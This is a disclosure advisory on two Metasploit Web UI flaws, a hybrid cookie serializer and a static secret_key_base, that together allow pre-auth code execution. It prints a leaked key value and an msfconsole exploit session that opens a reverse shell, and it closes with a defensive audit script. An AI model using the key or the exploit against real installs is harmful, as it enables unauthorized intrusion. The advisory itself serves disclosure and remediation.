
The following two issues combine to constitute a pre-auth Remote Code Execution vulnerability in Metasploit Community, Express and Pro 4.12 where any of certain Weekly Release updates between 4.12.0-2016061501 and 4.12.0-2016083001 have been applied.

Both issues were patched by Rapid7 in Weekly Release 4.12.0-2016091401.

A Metasploit Framework module that exploits these issues has been submitted for inclusion at

CVE-2016-1000243 Metasploit Web UI's config.action_dispatch.cookies_serializer is set to :hybrid

Rails applications accept signed cookies for managing sessions. Rails prior to 4.1 used Marshal serialization, which allowed for arbitrary instantiation of objects upon deserialization. Rails 4.1 introduced JSON cookie serialization [0] as the new default. Deserialization of JSON does not allow for arbitrary object instantiation, making it a much safer configuration in the event that the cookie signing key becomes known.

Rails 4.1 also introduced 'hybrid' cookie serialization, which allows for deserialization of both JSON and Marshal serialized cookies. This is to ease the transition from Rails <4.1 to Rails >=4.1 and avoids the invalidation of existing sessions when the server crosses that version boundary.

When the cookie serialization setting is either Marshal or hybrid, a remote unauthenticated attacker with knowledge of the cookie signing key can craft session cookies that, upon Marshal deserialization, trigger the execution of arbitrary code [1].

Metasploit Community, Express and Pro have the Web UI's config.action_dispatch.cookies_serializer setting set to :hybrid in versions before Metasploit 4.12.0-2016091401.

Rapid7 changed the Metasploit UI's config.action_dispatch.cookies_serializer setting to :json in Metasploit 4.12.0-2016091401.

Users should upgrade to Metasploit 4.12.0-2016091401 or newer.


CVE-2016-1000244 Metasploit Weekly Release Static secret_key_base pre-auth RCE

Metasploit Community, Express and Pro, after having had any of a particular set of Weekly Release updates applied, will have a static and publicly discoverable secret_key_base value for its Web UI. This allows a remote unauthenticated attacker to craft a signed cookie that will be deserialized by the application. Because Metasploit has its config.action_dispatch.cookies_serializer setting set to :hybrid, the attacker can cause the deserialization of arbitrary Marshalled objects, resulting in pre-auth RCE as the daemon user.

The known secret_key_base values are as follows:

unreleased build,b4bc1fa288894518088bf70c825e5ce6d5b16bbf20020018272383e09e5677757c6f1cc12eb39421eaf57f81822a434af10971b5762ae64cb1119054078b7201fa6c5e7aacdc00d5837a50b20a049bd502fcf7ed86b360d7c71942b983a547dde26a170bec3f11f42bee6a494dc2c11ae7dbd6d17927349cdcb81f0e9f17d22c

Code execution can be achieved using the Metasploit Framework module exploit/multi/http/rails_secret_deserialization. Note that, as of the time of writing, this module does not work against modern Ruby. There is an open PR [0] that fixes the popchain to make this module great again.

A standalone module that exploits this issue has been submitted for inclusion in Metasploit Framework [1]:

msf exploit(metasploit_static_secret_key_base) > info

       Name: Metasploit Web UI Static secret_key_base Value
     Module: exploit/multi/http/metasploit_static_secret_key_base
   Platform: Ruby
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-09-15

Provided by:
  Justin Steven
  joernchen of Phenoelit <>

Available targets:
  Id  Name
  --  ----
  0   Metasploit 4.12.0-2016061501 to 4.12.0-2016083001

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      3790             yes       The target port
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The path to the Metasploit Web UI
  VHOST                       no        HTTP server virtual host

Payload information:

  This module exploits the Web UI for Metasploit Community, Express
  and Pro where one of a certain set of Weekly Releases have been
  applied. These Weekly Releases introduced a static secret_key_base
  value. Knowledge of the static secret_key_base value allows for
  deserialization of a crafted Ruby Object, achieving code execution.
  This module is based on

  OVE (20160904-0002)

msf exploit(metasploit_static_secret_key_base) > set RHOST
msf exploit(metasploit_static_secret_key_base) > set PAYLOAD ruby/shell_reverse_tcp
PAYLOAD => ruby/shell_reverse_tcp
msf exploit(metasploit_static_secret_key_base) > set LHOST
msf exploit(metasploit_static_secret_key_base) > set LPORT 4444
LPORT => 4444
msf exploit(metasploit_static_secret_key_base) > exploit

[*] Started reverse TCP handler on
[*] Checking for cookie _ui_session
[*] Searching for proper SECRET
[*] Sending cookie _ui_session
[*] Command shell session 1 opened ( -> at 2016-09-19 19:26:30 +1000

uid=1(daemon) gid=1(daemon) groups=1(daemon)
Abort session 1? [y/N]  y

[*] - Command shell session 1 closed.  Reason: User exit

Rapid7 addressed this issue in Metasploit 4.12.0-2016091401. When the update is installed, it checks whether one of the known secret_key_base values is in use and, if so, regenerates it.

Users should upgrade to Metasploit 4.12.0-2016091401 or newer.
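
A configuration audit covering both issues above, as an added example (not Rapid7's update logic and not code from this advisory): it flags a Marshal-capable cookies_serializer and a secret_key_base that appears in a known-static list. The initializer and secrets YAML contents, the placeholder key and all function names are assumptions made for illustration.

```ruby
require 'securerandom'
require 'set'
require 'yaml'

# Constructed placeholder, not a real leaked value. Populate this set from
# the advisory's list of known secret_key_base values.
KNOWN_STATIC_KEYS = Set['0123456789abcdef' * 8].freeze

# Serializers that let a validly signed cookie reach Marshal.load.
MARSHAL_CAPABLE = %i[hybrid marshal].freeze

# Last uncommented cookies_serializer assignment in initializer source,
# as a symbol; nil when the setting is absent.
def cookies_serializer(initializer_src)
  live = initializer_src.lines.reject { |l| l.lstrip.start_with?('#') }
  live.join.scan(/cookies_serializer\s*=\s*:(\w+)/).flatten.last&.to_sym
end

# Returns a list of finding symbols; an empty list means nothing was flagged.
def audit(initializer_src, secrets_yaml, env: 'production')
  findings = []
  serializer = cookies_serializer(initializer_src)
  if serializer.nil?
    findings << :serializer_unset # effective default depends on Rails version
  elsif MARSHAL_CAPABLE.include?(serializer)
    findings << :marshal_capable_serializer
  end

  key = (YAML.safe_load(secrets_yaml) || {}).dig(env, 'secret_key_base').to_s
  if key.empty?
    findings << :secret_key_base_missing
  elsif KNOWN_STATIC_KEYS.include?(key.strip.downcase)
    findings << :static_secret_key_base
  end
  findings
end

# Replacement key: 64 random bytes from the system CSPRNG, hex encoded.
def fresh_secret_key_base
  SecureRandom.hex(64)
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample input (hypothetical file contents).
  init = "Rails.application.config.action_dispatch.cookies_serializer = :hybrid\n"
  secrets = "production:\n  secret_key_base: #{'0123456789abcdef' * 8}\n"
  p audit(init, secrets)
end
```

Either finding alone is worth fixing: a rotated key with :hybrid still leaves Marshal reachable if the key leaks again, and :json with a published key still lets anyone forge session contents.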


Justin Steven